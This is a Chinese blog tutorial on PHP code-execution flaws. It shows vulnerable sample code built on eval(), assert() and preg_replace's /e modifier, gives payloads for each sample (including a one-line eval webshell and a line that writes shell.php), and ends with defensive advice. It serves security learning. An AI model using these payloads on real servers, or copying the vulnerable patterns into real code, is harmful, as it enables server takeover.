代码执行漏洞

已于 2023-10-29 19:43:58 修改
阅读量78 收藏
点赞数 1
文章标签: 笔记
于 2023-10-28 22:14:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63527808/article/details/134097198
版权

一、代码执行漏洞:

1、漏洞简述:

        当应用在调用一些字符串转化为代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。

2、代码执行常见函数:

(1)PHP:

1、eval():把一些字符串当作代码来执行
2、assert():执行一些函数
3、preg_replace()

(2)JAVA:

没有类似的函数,但是一些引擎可以达成相同的效果

二、实例:

1、对于 assert() 函数:

(1)实例源码:

<?php
	function funtest1(){
		echo '这是一个页面';
	}
	
	$_GET['a']($_GET['b']);
?>

 (2)payload:

?a=assert&b=phpinfo()
2、对于 eval() 函数:

(1)实例源码:

<?php
	if(isset($_GET['cc'])){
		@eval($_GET['cc']);
	}else{
		echo "请传入参数!";
	}
?>

(2)payload:

?cc=echo chunchun;
?cc=phpinfo();
?cc=@eval($_POST['cmd']);

有时候需要先执行正确的语句,这时候应该设置为:
?cc=echo 1;@eval($_POST['cmd']);

?cc=fputs(fopen("shell.php","a"),"<?php phpinfo();?>");
3、对于 preg_replace() 函数:

实例1:

(1)源码:

<?php
    function complexStrtolower($regex, $value)
    {
        return preg_replace('/(' . $regex . ')/ie', 'strtolower("\\1")', $value);
    }
    foreach ($_GET as $regex => $value) {
        complexStrtolower($regex, $value);
    }
?>

(2)payload:

?\S*={${phpinfo()}}

实例2:

(1)源码:

<?php
	$value = $_GET['cc'];
	preg_replace('/(\S*)/ie', "\\1", $value);
?>

(2)payload:

?cc=phpinfo()

实例3:

(1)源码:

<?php
$data = $_GET['data'];
preg_replace('/<data>(.*)<\/data>/e','$ret = "\\1";',$data);
?>

(2)payload:

?data=<data>{${phpinfo()}}</data>

三、漏洞防御:

1、使用 json 保存数组;

2、对于必须使用 eval 的地方,一定严格处理用户数据(白名单、黑名单);

3、字符串使用单引号包括可控代码,插入前使用 addslashes 转义(addslashes、魔术引号、 htmlspecialchars、 htmlentities、mysql_real_escape_string) ;

4、放弃使用 preg_replace 的 e 修饰符,使用 preg_replace_callback()替换;

5、若必须使用 preg_replace 的 e 修饰符,则必用单引号包裹正则匹配出的对象;

YUkawa539
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
关于Android中WebView远程代码执行漏洞浅析
08-27
主要给大家介绍了关于Android中WebView远程代码执行漏洞的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
WPS Office 代码执行漏洞(QVD-2023-17241)
08-13
WPS Office 代码执行漏洞(QVD-2023-17241)
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
远程代码执行漏洞利用
Z_l123的博客
03-01 363
PHP下,允许命令执行的函数有 eval() assert() preg_replace() call_user_func() $a($b) eval() <?php if(isset($_GET['a'])){ eval($_GET['a']); } else{ echo "Please input a"; } ?> assert() <?php if(isset($_GET['a'])){ assert($_GET['a']); } else{ e
PHP代码注入详解
Zeker62的博客
08-16 4897
PHP代码注入的原理和解析 PHP代码注入靠的是RCE,即远程代码执行。 指应用程序过滤不严,hacker可以将代码注入到服务器进行远程的执行。 危害和SSRF相似,通过这个漏洞可以操控服务器的动作。 最典型的就是一句话木马。 PHP代码漏洞注入的两个要素: 程序中含有可执行的PHP代码函数 传入第一点的参数,客户端可控,直接修改或者影响 下面将对PHP相关函数和语句以及注入方法进行解释 eval() eval()函数在很多语言中都有,比如Python、PHP。 eval函数的作用是将字符串作为PHP语
ctfshow web入门 php特性
Sentiment的博客
04-11 5247
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
Web安全:代码执行漏洞 测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-26 699
攻击者可以通过构造恶意输入来欺骗应用程序执行恶意代码。这种漏洞通常出现在应用程序中使用动态语言(如 PHP、Python、Ruby 等)编写的代码中,因为这些语言允许在运行时动态执行代码。攻击者可以通过构造特定的输入来欺骗应用程序执行恶意代码,例如在输入中注入恶意代码、利用应用程序中的漏洞绕过输入验证等.
代码执行漏洞 | iwebsec
weixin_52116519的博客
03-04 2316
call_user_func()、call_user_func_array()函数的功能是调用函数,多用在框架中动态调用函数,所以一般比较小的程序较少出现这种方式的代码执行。array_map()函数的作用是调用函数,并且除第一个参数外其他参数为数组,通常会写死第一个参数,即写死调用函数。
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
网络安全菜鸟学习之漏洞篇——代码执行漏洞(一)
gqzszzy的博客
10-28 714
这篇文章我们来学习学习代码执行漏洞代码执行漏洞顾名思义,是由于程序员编写程序的时候使用了一些不安全的函数所造成的。这样说不够生动,我们来学习一下就懂了。 这篇文章我们来学习eval()和assert()。 说到eval()和assert()不得不提到了一句话木马。(如下) <?php @eval($_POST[value]);?> 我们发现一句话木马就是使用的是eval。我们知道我们可以通过蚁剑连接一句话木马,从而控制别人后台。那么我们是不是可以猜测一句话木马是这个函数照成的。因此我们来做以
php代码命令执行漏洞-常见危险函数
qq_41272376的博客
02-16 4799
php代码/命令执行漏洞-常见危险函数 php代码执行相关 eval() mixed eval ( string $code ) 把字符串code作为php代码执行。常见的一句话木马: <?php eval($_GET['pass']) ?> 访问: http://xxx/codeexec.php?pass=phpinfo(); 得到phpinfo()页面。 assert() PHP 5 bool assert ( mixed $assertion [, string $desc
MySQL数据库笔记(二)
最新发布
2301_78671299的博客
06-18 1024
操作数据对象。接受参数返回一个结果。只对一行进行变换。每行返回一个结果。可以嵌套。参数可以是一列或一个值。聚合函数作用于一组数据,并对一组数据返回一个值。子查询指一个查询语句嵌套在另一个查询语句内部的查询。多表查询,也称为关联查询,指两个或更多个表一起完成查询操作。前提条件:这些一起查询的表之间是有关系的(一对一、一对多),它们之间一定是有关联字段,这个关联字段可能建立外键,也可能没有建立外键。比如:员工表和部门表,这两个表依靠“部门编号”进行关联。
dvwa代码执行漏洞
05-30
DVWA(Damn Vulnerable Web Application)是一个专门用于测试Web应用程序安全漏洞的平台,其中包含了一些常见的Web漏洞类型,包括代码执行漏洞。 在DVWA中,代码执行漏洞通常是通过不正确使用用户输入来实现的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值